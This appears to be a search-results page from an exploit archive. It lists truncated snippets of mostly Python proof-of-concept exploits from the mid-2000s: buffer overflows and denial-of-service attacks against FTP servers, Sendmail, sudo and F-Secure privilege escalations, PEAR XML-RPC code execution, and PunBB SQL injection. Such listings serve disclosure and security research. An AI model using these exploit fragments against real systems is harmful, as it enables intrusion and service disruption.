1321 matches found
Hewlett-Packard FTP Print Server <= 2.4.5 Buffer Overflow (PoC)
No description provided by source. !/usr/bin/python import sys from ftplib import FTP print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow POC" print "Copyright c Joxean Koret" print if lensys.argv == 1: print "Usage: %s target" % sys.argv0 sys.exit0 target = sys.argv1 print "+...
MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)
Exploit for unknown platform in category dos / poc. MS Windows DNS Resolution Remote Denial of Service PoC MS06-041. !/usr/bin/python POC for MS06-041 Run the python...
Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)
!/usr/bin/python POC for MS06-041 Run the python script passing the local ip address as parameter. The DNS server will start listening on this ip address for DNS hostname resolution queries. This script is for testing and educational purpose and so to test this one will have to point the DNS...
F-Prot Antivirus 4.6.6 (ACE) Denial of Service Exploit
No description provided by source. fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS Copyright c 2006 Evgeny Legerov Permission to use, copy, modify, and distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and...
WarFTPd 1.82.00-RC11 Remote Denial of Service Exploit
No description provided by source. !/usr/bin/env python import sys import ftplib print "WARFTPD Remote Denial Of Service DOS" print "Copyright c Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP print "+ Connecting to target " msg = ftp.connecttarget, targetPort...
WFTPD Pro Server 3.23.1.1 - APPE Remote Buffer Overflow (PoC)
WFTPD Pro Server 3.23.1.1 - APPE Remote Buffer Overflow PoC !/usr/bin/env python import sys import struct import ftplib print "WFTPD Pro Server 3.23.1.1 Buffer Overflow Only a DOS currently, simple POC" print "Copyright c Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp =...
Easy File Sharing FTP Server 2.0 - 'PASS' Remote
!/usr/bin/python Easy File Sharing FTP Server 2.0 PASS 0day PoC exploit Proof of Concept: execute calc.exe Bug found by h07 Tested on XP SP2 polish Date: 28.07.2006 BUFFPASS + 0x20+0x2c+NOP 2571+0x41414141+\r\n EIP = 0x41414141 host = "127.0.0.1" port = 21 lenrecv = 1024 username = "anonymous"...
Sendmail 8.13.5 - Remote Signal Handling (PoC)
Sendmail 8.13.5 - Remote Signal Handling PoC !/usr/bin/env python [email protected] Sendmail 8.13.5 and below Remote Signal Handling exploit usage: rbl4ck-sendmail.py 127.0.0.1 0 25 this exploit was leaked to the PHC Phrack High Council so instead of only letting them have a copy, we figu...
rocksumountdirty.txt
!/usr/bin/env python rocksumountdirty.py: Rocks release =4.1 local root exploit quick and nasty version of the exploit. make sure the . is writable and you clean up afterwards. ; coded by: [email protected] http://xavsec.blogspot.com x=import'os';c=x.getcwd open'%s/x'%c, 'a'.write"!/bin/sh\ncp...
Back-end0721.txt
/ Federico Fazzi, / Back-end = 0.7.2.1 jpcache.php Remote command execution / 08/06/2006 1:04 Bug: jpcache.php: line 40 --- $includedir = $PSL'classdir' . "/jpcache"; --- Proof of concept: Back-end have a default path pre-set on jpcache.php, and cracker can execute a remote command...
freesshd-exploit.txt
!/usr/bin/env python """ Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0 ahmadtauqeeratyahoo.com Disclaimer: This Proof of concept exploit is for educational purpose only. Please do not use it against any system without prior permission. You are responsible for yourself for what you do with this cod...
Code injection
sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158...
CVE-2006-0151
sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158...
Sudo 1.6.x - Environment Variable Handling Security Bypass (2)
Sudo 1.6.x - Environment Variable Handling Security Bypass 2 source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A...
Sudo 1.6.x - Environment Variable Handling Security Bypass (2)
source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A local attacker with the ability to run Python scripts can...
F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation
!/usr/bin/env python F-Secure Anti-Virus Internet Gatekeeper for Linux " lastedit = "Thu Sep 22 23:18:39 EDT 2005" usage = """usage: %s -options options: --version show program's version number and exit. -h, --help show this help message and exit...
xmlrpc.py.txt
!/usr/bin/python ./xmlrpc.py chk|xpl host uri example check bug: ./xmlrpc.py chk www.postnuke.com /xmlrpc.php example exploit bug: ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working for me so i made this python code...
PunBB 1.2.4 (change_email) SQL Injection Exploit
Exploit for unknown platform in category web applications. PunBB 1.2.4 changeemail SQL Injection Exploit. !/usr/bin/python ...
Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit
Exploit for unknown platform in category dos / poc. Foxmail 2.0 MAIL FROM: Denial of Service Exploit. !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def...
Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit
No description provided by source. !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def usage: print "Usage: foxserver.py -h host -p port" sys.exit0 if name == 'main': try: opts, args = getopt.getoptsys.argv1:, "h:p:" except getopt.GetoptError, msg: print m...